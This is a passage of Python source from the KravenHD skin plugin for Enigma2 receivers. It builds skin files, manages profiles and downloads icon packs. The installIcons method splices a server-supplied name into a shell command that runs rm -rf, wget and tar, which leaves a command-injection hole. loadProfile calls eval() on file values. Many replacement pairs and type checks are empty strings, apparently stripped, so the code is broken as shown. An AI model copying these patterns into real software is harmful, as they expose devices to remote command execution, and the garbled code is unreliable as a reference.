config.plugins.KravenHD.IBStyle.value == \"grad\":\n\t\t\t### Timeshift_begin\n\t\t\tself.appendSkinFile(self.data + \"timeshift-begin.xml\")\n\n\t\t\tif self.actWeatherstyle in (\"weather-big\", \"weather-left\"):\n\t\t\t\tif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-bigsat\":\n\t\t\t\t\tself.appendSkinFile(self.data + \"timeshift-begin-leftlow.xml\")\n\t\t\t\telse:\n\t\t\t\t\tself.appendSkinFile(self.data + \"timeshift-begin-low.xml\")\n\t\t\telif self.actWeatherstyle == \"weather-small\":\n\t\t\t\tself.appendSkinFile(self.data + \"timeshift-begin-left.xml\")\n\t\t\telse:\n\t\t\t\tself.appendSkinFile(self.data + \"timeshift-begin-high.xml\")\n\n\t\t\t### Timeshift_end\n\t\t\tself.appendSkinFile(self.data + \"timeshift-end.xml\")\n\n\t\t\t### InfobarTunerState\n\t\t\tif self.actWeatherstyle in (\"weather-big\", \"weather-left\", \"netatmobar\"):\n\t\t\t\tif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-bigsat\":\n\t\t\t\t\tself.appendSkinFile(self.data + \"infobartunerstate-low.xml\")\n\t\t\t\telse:\n\t\t\t\t\tself.appendSkinFile(self.data + \"infobartunerstate-mid.xml\")\n\t\t\telse:\n\t\t\t\tself.appendSkinFile(self.data + \"infobartunerstate-high.xml\")\n\n\t\telif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.appendSkinFile(self.data + \"timeshift-ibts-ar.xml\")\n\n\t\t### PermanentClock\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-infobar-small\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"120,30\"', 'backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"80,20\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-global-big\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"120,30\"', 'backgroundColor=\"Kravenbg\" name=\"PermanentClockScreen\" size=\"120,30\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-global-small\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"120,30\"', 'backgroundColor=\"Kravenbg\" name=\"PermanentClockScreen\" size=\"80,20\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-transparent-big\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"120,30\"', 'backgroundColor=\"transparent\" name=\"PermanentClockScreen\" size=\"120,30\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-transparent-small\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"120,30\"', 'backgroundColor=\"transparent\" name=\"PermanentClockScreen\" size=\"80,20\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telse:\n\t\t\tif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-infobar-small\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"180,45\"', 'backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"120,30\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-global-big\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"180,45\"', 'backgroundColor=\"Kravenbg\" name=\"PermanentClockScreen\" size=\"180,45\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-global-small\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"180,45\"', 'backgroundColor=\"Kravenbg\" name=\"PermanentClockScreen\" size=\"120,30\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-transparent-big\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"180,45\"', 'backgroundColor=\"transparent\" name=\"PermanentClockScreen\" size=\"180,45\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-transparent-small\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"180,45\"', 'backgroundColor=\"transparent\" name=\"PermanentClockScreen\" size=\"120,30\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Plugins\n\t\tself.appendSkinFile(self.data + \"plugins.xml\")\n\n\t\t### MSNWeather\n\t\tif fileExists(\"/usr/lib/enigma2/python/Components/Converter/MSNWeather.pyo\"):\n\t\t\tif config.plugins.KravenHD.IBStyle.value == \"grad\" or config.plugins.KravenHD.PopupStyle.value in (\"popup-grad\", \"popup-grad-trans\"):\n\t\t\t\tself.changeColor(\"msnbg_gr\", \"msnbg\", self.skincolorbackgroundcolor, None)\n\t\t\telse:\n\t\t\t\tself.changeColor(\"msnbg\", \"msnbg\", self.skincolorbackgroundcolor, None)\n\t\t\tself.appendSkinFile(self.data + \"weatherplugin.xml\")\n\t\t\tif self.InternetAvailable and not fileExists(\"/usr/share/enigma2/KravenHD/msn_weather_icons/1.png\"):\n\t\t\t\tconsole3 = eConsoleAppContainer()\n\t\t\t\tconsole3.execute(\"wget -q http://picons.mynonpublic.com/msn-icon.tar.gz -O /tmp/msn-icon.tar.gz; tar xf /tmp/msn-icon.tar.gz -C /usr/share/enigma2/KravenHD/\")\n\t\telse:\n\t\t\tself.appendSkinFile(self.data + \"weatherplugin2.xml\")\n\n\t\t### NetatmoBar\n\t\tif self.InternetAvailable:\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/Netatmo/plugin.py\"):\n\t\t\t\t\tif self.actWeatherstyle == \"netatmobar\":\n\t\t\t\t\t\tself.appendSkinFile(self.data + \"netatmobar.xml\")\n\n\t\t### EMC (MovieList) Font-Colors\n\t\tself.skinSearchAndReplace.append(['UnwatchedColor=\"unwatched\"', 'UnwatchedColor=\"#00' + config.plugins.KravenHD.UnwatchedColor.value + '\"'])\n\t\tself.skinSearchAndReplace.append(['WatchingColor=\"watching\"', 'WatchingColor=\"#00' + config.plugins.KravenHD.WatchingColor.value + '\"'])\n\t\tself.skinSearchAndReplace.append(['FinishedColor=\"finished\"', 'FinishedColor=\"#00' + config.plugins.KravenHD.FinishedColor.value + '\"'])\n\n\t\t### EMC\n\t\tself.appendSkinFile(self.data + config.plugins.KravenHD.EMCStyle.value + \".xml\")\n\n\t\t### NumberZapExt\n\t\tself.appendSkinFile(self.data + config.plugins.KravenHD.NumberZapExt.value + \".xml\")\n\t\tif not config.plugins.KravenHD.NumberZapExt.value == \"none\":\n\t\t\tconfig.usage.numberzap_show_picon.value = True\n\t\t\tconfig.usage.numberzap_show_picon.save()\n\t\t\tconfig.usage.numberzap_show_servicename.value = True\n\t\t\tconfig.usage.numberzap_show_servicename.save()\n\n\t\t### FileCommander\n\t\tself.appendSkinFile(self.data + config.plugins.KravenHD.FileCommander.value + \".xml\")\n\n\t\t### EPGSelection\n\t\tself.appendSkinFile(self.data + config.plugins.KravenHD.EPGSelection.value + \".xml\")\n\n\t\t### CoolTVGuide\n\t\tself.appendSkinFile(self.data + config.plugins.KravenHD.CoolTVGuide.value + \".xml\")\n\n\t\t### GraphicalEPG (Event-Description) Font-Size\n\t\tif config.plugins.KravenHD.GMEDescriptionSize.value == \"big\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### GraphicalEPG\n\t\tif config.plugins.KravenHD.GraphicalEPG.value == \"text\":\n\t\t\tconfig.epgselection.graph_type_mode.value = False\n\t\t\tconfig.epgselection.graph_type_mode.save()\n\t\t\tconfig.epgselection.graph_pig.value = False\n\t\t\tconfig.epgselection.graph_pig.save()\n\t\telif config.plugins.KravenHD.GraphicalEPG.value == \"text-minitv\":\n\t\t\tconfig.epgselection.graph_type_mode.value = False\n\t\t\tconfig.epgselection.graph_type_mode.save()\n\t\t\tconfig.epgselection.graph_pig.value = True\n\t\t\tconfig.epgselection.graph_pig.save()\n\t\telif config.plugins.KravenHD.GraphicalEPG.value == \"graphical\":\n\t\t\tconfig.epgselection.graph_type_mode.value = \"graphics\"\n\t\t\tconfig.epgselection.graph_type_mode.save()\n\t\t\tconfig.epgselection.graph_pig.value = False\n\t\t\tconfig.epgselection.graph_pig.save()\n\t\telif config.plugins.KravenHD.GraphicalEPG.value == \"graphical-minitv\":\n\t\t\tconfig.epgselection.graph_type_mode.value = \"graphics\"\n\t\t\tconfig.epgselection.graph_type_mode.save()\n\t\t\tconfig.epgselection.graph_pig.value = True\n\t\t\tconfig.epgselection.graph_pig.save()\n\n\t\t### MovieSelection\n\t\tself.appendSkinFile(self.data + config.plugins.KravenHD.MovieSelection.value + \".xml\")\n\n\t\t### bsWindow\n\t\tself.makebsWindowpng()\n\n\t\t### VirtualKeyBoard\n\t\tif config.plugins.KravenHD.PopupStyle.value == \"popup-grad-trans\":\n\t\t\tself.changeColor(\"virtualkeyboard_gr_tr\",\"virtualkeyboard\",self.skincolorbackgroundcolor,None)\n\t\telif config.plugins.KravenHD.PopupStyle.value == \"popup-grad\":\n\t\t\tself.changeColor(\"virtualkeyboard_gr\",\"virtualkeyboard\",self.skincolorbackgroundcolor,None)\n\t\telif config.plugins.KravenHD.PopupStyle.value == \"popup-box-trans\":\n\t\t\tself.changeColor(\"virtualkeyboard_bx_tr\",\"virtualkeyboard\",self.skincolorbackgroundcolor,config.plugins.KravenHD.Border.value)\n\t\telif config.plugins.KravenHD.PopupStyle.value == \"popup-box\":\n\t\t\tself.changeColor(\"virtualkeyboard_bx\",\"virtualkeyboard\",self.skincolorbackgroundcolor,config.plugins.KravenHD.Border.value)\n\n\t\t### SerienRecorder\n\t\tif config.plugins.KravenHD.SerienRecorder.value == \"serienrecorder\":\n\t\t\tself.appendSkinFile(self.data + config.plugins.KravenHD.SerienRecorder.value + \".xml\")\n\t\t\tself.changeColor(\"popup_bg\", \"popup_bg\", self.skincolorbackgroundcolor, config.plugins.KravenHD.Border.value)\n\n\t\t### MediaPortal\n\t\tconsole4 = eConsoleAppContainer()\n\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/plugin.py\"):\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tif config.plugins.KravenHD.MediaPortal.value == \"mediaportal\":\n\t\t\t\t\tconsole4.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/HD/MediaPortal.tar.gz -C /usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_720/\")\n\t\t\t\telse:\n\t\t\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_720/KravenHD/MP_skin.xml\"):\n\t\t\t\t\t\tconsole4.execute(\"rm -rf /usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_720/KravenHD\")\n\t\t\telse:\n\t\t\t\tif config.plugins.KravenHD.MediaPortal.value == \"mediaportal\":\n\t\t\t\t\tconsole4.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/FHD/MediaPortal.tar.gz -C /usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_1080/\")\n\t\t\t\telse:\n\t\t\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_1080/KravenHD/MP_skin.xml\"):\n\t\t\t\t\t\tconsole4.execute(\"rm -rf /usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_1080/KravenHD\")\n\n\t\t### skin-user\n\t\ttry:\n\t\t\tself.appendSkinFile(self.data + \"skin-user.xml\")\n\t\texcept:\n\t\t\tpass\n\n\t\t### skin-end\n\t\tself.appendSkinFile(self.data + \"skin-end.xml\")\n\n\t\txFile = open(self.dateiTMP, \"w\")\n\t\tfor xx in self.skin_lines:\n\t\t\txFile.writelines(xx)\n\t\txFile.close()\n\n\t\tmove(self.dateiTMP, self.datei)\n\n\t\t### Menu icons download - we do it here to give it some time\n\t\tif self.InternetAvailable:\n\t\t\tif config.plugins.KravenHD.Logo.value in (\"metrix-icons\", \"minitv-metrix-icons\"):\n\t\t\t\tself.installIcons(config.plugins.KravenHD.MenuIcons.value)\n\n\t\t# make global background graphics\n\t\tif config.plugins.KravenHD.BackgroundColor.value == \"gradient\":\n\t\t\tself.makeBGGradientpng()\n\t\telif config.plugins.KravenHD.BackgroundColor.value == \"texture\":\n\t\t\tself.makeBGTexturepng()\n\n\t\t# make infobar background graphics\n\t\tif config.plugins.KravenHD.IBStyle.value == \"grad\":\n\t\t\tif config.plugins.KravenHD.InfobarGradientColor.value == \"texture\":\n\t\t\t\tself.makeIBGradTexturepng()\n\t\t\telse: # single color\n\t\t\t\tself.makeIBGradColorpng()\n\t\telif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.makeIBGradientpng()\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.makeIBTexturepng()\n\n\t\t# make selection pixmaps\n\t\tif config.plugins.KravenHD.SelectionStyle.value == \"pixmap\":\n\t\t\tself.makeSELGradientpng()\n\n\t\t# copy bsWindow to MediaPortal-folder\n\t\tconsole5 = eConsoleAppContainer()\n\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_720/KravenHD/MP_skin.xml\") and config.plugins.KravenHD.MediaPortal.value == \"mediaportal\" and config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tconsole5.execute(\"cp /usr/share/enigma2/KravenHD/graphics/bs_* /usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_720/KravenHD/images/\")\n\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_1080/KravenHD/MP_skin.xml\") and config.plugins.KravenHD.MediaPortal.value == \"mediaportal\" and config.plugins.KravenHD.SkinResolution.value == \"fhd\":\n\t\t\tconsole5.execute(\"cp /usr/share/enigma2/KravenHD/graphics/bs_* /usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_1080/KravenHD/images/\")\n\n\t\t# Thats it\n\t\tself.restart()\n\n\tdef restart(self):\n\t\tconfigfile.save()\n\t\trestartbox = self.session.openWithCallback(self.restartGUI, MessageBox, _(\"GUI needs a restart to apply a new skin.\\nDo you want to Restart the GUI now?\"), MessageBox.TYPE_YESNO)\n\t\trestartbox.setTitle(_(\"Restart GUI\"))\n\n\tdef appendSkinFile(self, appendFileName, skinPartSearchAndReplace=None):\n\t\t\"\"\"\n\t\tadd skin file to main skin content\n\n\t\tappendFileName:\n\t\t xml skin-part to add\n\n\t\tskinPartSearchAndReplace:\n\t\t (optional) a list of search and replace arrays. first element, search, second for replace\n\t\t\"\"\"\n\t\tskFile = open(appendFileName, \"r\")\n\t\tfile_lines = skFile.readlines()\n\t\tskFile.close()\n\n\t\ttmpSearchAndReplace = []\n\n\t\tif skinPartSearchAndReplace is not None:\n\t\t\ttmpSearchAndReplace = self.skinSearchAndReplace + skinPartSearchAndReplace\n\t\telse:\n\t\t\ttmpSearchAndReplace = self.skinSearchAndReplace\n\n\t\tfor skinLine in file_lines:\n\t\t\tfor item in tmpSearchAndReplace:\n\t\t\t\tskinLine = skinLine.replace(item[0], item[1])\n\t\t\tself.skin_lines.append(skinLine)\n\n\tdef restartGUI(self, answer):\n\t\tif answer is True:\n\t\t\tconfig.skin.primary_skin.setValue(\"KravenHD/skin.xml\")\n\t\t\tconfig.skin.save()\n\t\t\tconfigfile.save()\n\t\t\tself.session.open(TryQuitMainloop, 3)\n\t\telse:\n\t\t\tself.close()\n\n\tdef exit(self):\n\t\taskExit = self.session.openWithCallback(self.doExit, MessageBox, _(\"Do you really want to exit without saving?\"), MessageBox.TYPE_YESNO)\n\t\taskExit.setTitle(_(\"Exit\"))\n\n\tdef doExit(self, answer):\n\t\tif answer is True:\n\t\t\tfor x in self[\"config\"].list:\n\t\t\t\tif len(x) > 1:\n\t\t\t\t\t\tx[1].cancel()\n\t\t\t\telse:\n\t\t\t\t\t\tpass\n\t\t\tself.close()\n\t\telse:\n\t\t\tself.mylist()\n\n\tdef getBoxName(self):\n\t\tif fileExists(\"/proc/stb/info/vumodel\"):\n\t\t\tfile = open('/proc/stb/info/vumodel', 'r')\n\t\t\tboxname = file.readline().strip()\n\t\t\tfile.close()\n\t\t\treturn boxname\n\t\telse:\n\t\t\ttry:\n\t\t\t\tfrom boxbranding import getMachineName\n\t\t\t\treturn getMachineName()\n\t\t\texcept ImportError:\n\t\t\t\treturn \"unknown\"\n\n\tdef getTuners(self):\n\t\tfrom Components.Sources.TunerInfo import TunerInfo\n\t\ttinfo = TunerInfo()\n\t\ttuners = tinfo.getTunerAmount()\n\t\tif tuners == 1:\n\t\t\treturn \"1-tuner\"\n\t\telif tuners == 2:\n\t\t\treturn \"2-tuner\"\n\t\telif (3 <= tuners <= 4):\n\t\t\treturn \"4-tuner\"\n\t\telif (5 <= tuners):\n\t\t\treturn \"8-tuner\"\n\t\telse:\n\t\t\treturn \"1-tuner\"\n\n\tdef getInternetAvailable(self):\n\t\tfrom . import ping\n\t\tr = ping.doOne(\"8.8.8.8\", 1.5)\n\t\tif r != None and r <= 1.5:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef getUserMenuIconsAvailable(self):\n\t\tuserpath=\"/usr/share/enigma2/Kraven-user-icons\"\n\t\tif path.exists(userpath) and any(File.endswith(\".png\") for File in listdir(userpath)):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef reset(self):\n\t\taskReset = self.session.openWithCallback(self.doReset, MessageBox, _(\"Do you really want to reset all values to the selected default profile?\"), MessageBox.TYPE_YESNO)\n\t\taskReset.setTitle(_(\"Reset profile\"))\n\n\tdef doReset(self, answer):\n\t\tif answer is True:\n\t\t\tif config.plugins.KravenHD.defaultProfile.value == \"default\":\n\t\t\t\tfor name in config.plugins.KravenHD.dict():\n\t\t\t\t\tif not name in (\"customProfile\", \"DebugNames\"):\n\t\t\t\t\t\titem=(getattr(config.plugins.KravenHD, name))\n\t\t\t\t\t\titem.value=item.default\n\t\t\telse:\n\t\t\t\tself.loadProfile(loadDefault=True)\n\t\tself.mylist()\n\n\tdef showColor(self, actcolor):\n\t\tc = self[\"Canvas\"]\n\t\tc.fill(0, 0, 368, 207, actcolor)\n\t\tc.flush()\n\n\tdef showGradient(self, color1, color2):\n\t\twidth=368\n\t\theight=207\n\t\tcolor1=color1[-6:]\n\t\tr1=int(color1[0:2], 16)\n\t\tg1=int(color1[2:4], 16)\n\t\tb1=int(color1[4:6], 16)\n\t\tcolor2=color2[-6:]\n\t\tr2=int(color2[0:2], 16)\n\t\tg2=int(color2[2:4], 16)\n\t\tb2=int(color2[4:6], 16)\n\t\tc = self[\"Canvas\"]\n\t\tif color1!=color2:\n\t\t\tfor pos in range(0, height):\n\t\t\t\tp=pos/float(height)\n\t\t\t\tr=r2*p+r1*(1-p)\n\t\t\t\tg=g2*p+g1*(1-p)\n\t\t\t\tb=b2*p+b1*(1-p)\n\t\t\t\tc.fill(0, pos, width, 1, self.RGB(int(r), int(g), int(b)))\n\t\telse:\n\t\t\tc.fill(0, 0, width, height, self.RGB(int(r1), int(g1), int(b1)))\n\t\tc.flush()\n\n\tdef showText(self, fontsize, text):\n\t\tfrom enigma import gFont, RT_HALIGN_CENTER, RT_VALIGN_CENTER\n\t\tc = self[\"Canvas\"]\n\t\tc.fill(0, 0, 368, 207, self.RGB(0, 0, 0))\n\t\tc.writeText(0, 0, 368, 207, self.RGB(255, 255, 255), self.RGB(0, 0, 0), gFont(\"Regular\", fontsize), text, RT_HALIGN_CENTER+RT_VALIGN_CENTER)\n\t\tc.flush()\n\n\tdef loadProfile(self,loadDefault=False):\n\t\tif loadDefault:\n\t\t\tprofile=config.plugins.KravenHD.defaultProfile.value\n\t\t\tfname=self.profiles+\"kravenhd_default_\"+profile\n\t\telse:\n\t\t\tprofile=config.plugins.KravenHD.customProfile.value\n\t\t\tfname=self.profiles+\"kravenhd_profile_\"+profile\n\t\tif profile and fileExists(fname):\n\t\t\tprint (\"KravenPlugin: Load profile \"+fname)\n\t\t\t\n\t\t\tpFile=open(fname, \"r\")\n\t\t\tfor line in pFile:\n\t\t\t\ttry:\n\t\t\t\t\tline=line.split(\"|\")\n\t\t\t\t\tname=line[0]\n\t\t\t\t\tvalue=line[1]\n\t\t\t\t\ttype=line[2].strip('\\n')\n\t\t\t\t\tif not (name in (\"customProfile\", \"DebugNames\", \"msn_language\", \"msn_searchby\", \"msn_list\", \"msn_cityname\", \"msn_code\") or (loadDefault and name == \"defaultProfile\")):\n\t\t\t\t\t\t# fix for changed value \"gradient\"/\"grad\"\n\t\t\t\t\t\tif name==\"IBStyle\" and value==\"gradient\":\n\t\t\t\t\t\t\tvalue=\"grad\"\n\t\t\t\t\t\t# fix for changed name \"InfobarColor\"/\"InfobarGradientColor\"\n\t\t\t\t\t\tif name==\"InfobarColor\":\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.InfobarGradientColor.value=value\n\t\t\t\t\t\tif type == \"\":\n\t\t\t\t\t\t\tgetattr(config.plugins.KravenHD, name).value=int(value)\n\t\t\t\t\t\telif type == \"\":\n\t\t\t\t\t\t\tgetattr(config.plugins.KravenHD, name).value=hex(value)\n\t\t\t\t\t\telif type == \"\":\n\t\t\t\t\t\t\tgetattr(config.plugins.KravenHD, name).value=eval(value)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tgetattr(config.plugins.KravenHD, name).value=str(value)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\tpFile.close()\n\n\t\telif not loadDefault:\n\t\t\tprint (\"KravenPlugin: Create profile \"+fname)\n\t\t\tself.saveProfile(msg=False)\n\n\tdef saveProfile(self,msg=True):\n\t\tprofile=config.plugins.KravenHD.customProfile.value\n\t\tif profile:\n\t\t\ttry:\n\t\t\t\tfname=self.profiles+\"kravenhd_profile_\"+profile\n\t\t\t\tprint (\"KravenPlugin: Save profile \"+fname)\n\t\t\t\tpFile=open(fname, \"w\")\n\t\t\t\tfor name in config.plugins.KravenHD.dict():\n\t\t\t\t\tif not name in (\"customProfile\", \"DebugNames\", \"msn_language\", \"msn_searchby\", \"msn_list\", \"msn_cityname\", \"msn_code\"):\n\t\t\t\t\t\tvalue=getattr(config.plugins.KravenHD, name).value\n\t\t\t\t\t\tpFile.writelines(name+\"|\"+str(value)+\"|\"+str(type(value))+\"\\n\")\n\t\t\t\tpFile.close()\n\t\t\t\tif msg:\n\t\t\t\t\tself.session.open(MessageBox, _(\"Profile \")+str(profile)+_(\" saved successfully.\"), MessageBox.TYPE_INFO, timeout=5)\n\t\t\texcept:\n\t\t\t\tself.session.open(MessageBox, _(\"Profile \")+str(profile)+_(\" could not be saved!\"), MessageBox.TYPE_INFO, timeout=15)\n\n\tdef installIcons(self, author):\n\n\t\tif self.InternetAvailable == False: \n\t\t\treturn\n\n\t\tpathname=\"http://picons.mynonpublic.com/\"\n\t\tinstname=\"/usr/share/enigma2/Kraven-menu-icons/iconpackname\"\n\t\tversname=\"Kraven-Menu-Icons-by-\"+author+\".packname\"\n\t\t\n\t\t# Read iconpack version on box\n\t\tpackinstalled = \"not installed\"\n\t\tif fileExists(instname):\n\t\t\tpFile=open(instname, \"r\")\n\t\t\tfor line in pFile:\n\t\t\t\tpackinstalled=line.strip('\\n')\n\t\t\tpFile.close()\n\t\tprint (\"KravenPlugin: Iconpack on box is \"+packinstalled)\n\t\t\n\t\t# Read iconpack version on server\n\t\tpackonserver = \"unknown\"\n\t\tfullversname=pathname+versname\n\t\tsub=subprocess.Popen(\"wget -q \"+fullversname+\" -O /tmp/\"+versname, shell=True)\n\t\tsub.wait()\n\t\tif fileExists(\"/tmp/\"+versname):\n\t\t\tpFile=open(\"/tmp/\"+versname, \"r\")\n\t\t\tfor line in pFile:\n\t\t\t\tpackonserver=line.strip('\\n')\n\t\t\tpFile.close()\n\t\t\tpopen(\"rm /tmp/\"+versname)\n\t\t\tprint (\"KravenPlugin: Iconpack on server is \"+packonserver)\n\n\t\t\t# Download an install icon pack, if needed\n\t\t\tif packinstalled != packonserver:\n\t\t\t\tpackname=packonserver\n\t\t\t\tfullpackname=pathname+packname\n\t\t\t\tsub=subprocess.Popen(\"rm -rf /usr/share/enigma2/Kraven-menu-icons/*.*; rm -rf /usr/share/enigma2/Kraven-menu-icons; wget -q \"+fullpackname+\" -O /tmp/\"+packname+\"; tar xf /tmp/\"+packname+\" -C /usr/share/enigma2/\", shell=True)\n\t\t\t\tsub.wait()\n\t\t\t\tpopen(\"rm /tmp/\"+packname)\n\t\t\t\tprint (\"KravenPlugin: Installed iconpack \"+fullpackname)\n\t\t\telse:\n\t\t\t\tprint (\"KravenPlugin: No need to install other iconpack\")\n\n\tdef makeTexturePreview(self, style):\n\t\twidth = 368\n\t\theight = 207\n\t\tinpath = \"/usr/share/enigma2/KravenHD/textures/\"\n\t\tusrpath = \"/usr/share/enigma2/Kraven-user-icons/\"\n\t\toutpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/\"\n\n\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\telif fileExists(inpath + style + \".png\"):\n\t\t\tbg = Image.open(inpath + style + \".png\")\n\t\telif fileExists(inpath + style + \".jpg\"):\n\t\t\tbg = Image.open(inpath + style + \".jpg\")\n\t\tbg_w, bg_h = bg.size\n\t\timage = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, height, bg_h):\n\t\t\t\timage.paste(bg, (i, j))\n\t\timage.save(outpath + \"preview.jpg\")\n\t\t\n\tdef makeAlternatePreview(self, style, color):\n\t\twidth = 368\n\t\theight = 207\n\t\tinpath = \"/usr/share/enigma2/KravenHD/textures/\"\n\t\tusrpath = \"/usr/share/enigma2/Kraven-user-icons/\"\n\t\toutpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/\"\n\n\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\telif fileExists(inpath + style + \".png\"):\n\t\t\tbg = Image.open(inpath + style + \".png\")\n\t\telif fileExists(inpath + style + \".jpg\"):\n\t\t\tbg = Image.open(inpath + style + \".jpg\")\n\t\tbg_w, bg_h = bg.size\n\t\timage = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, height, bg_h):\n\t\t\t\timage.paste(bg, (i, j))\n\t\tcolor=color[-6:]\n\t\tr=int(color[0:2], 16)\n\t\tg=int(color[2:4], 16)\n\t\tb=int(color[4:6], 16)\n\t\timage.paste((int(r), int(g), int(b), 255), (0, int(height/2), width, height))\n\t\timage.save(outpath + \"preview.jpg\")\n\t\t\n\tdef makePreview(self):\n\t\twidth = 368\n\t\theight = 208\n\t\tlineheight = 3\n\t\tboxbarheight = 40\n\t\tgradbarheight = 80\n\t\tinpath = \"/usr/share/enigma2/KravenHD/textures/\"\n\t\tusrpath = \"/usr/share/enigma2/Kraven-user-icons/\"\n\t\t\t\n\t\t# background\n\t\tif config.plugins.KravenHD.BackgroundColor.value == \"texture\":\n\t\t\tstyle = config.plugins.KravenHD.BackgroundTexture.value\n\t\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\t\telif fileExists(inpath + style + \".png\"):\n\t\t\t\tbg = Image.open(inpath + style + 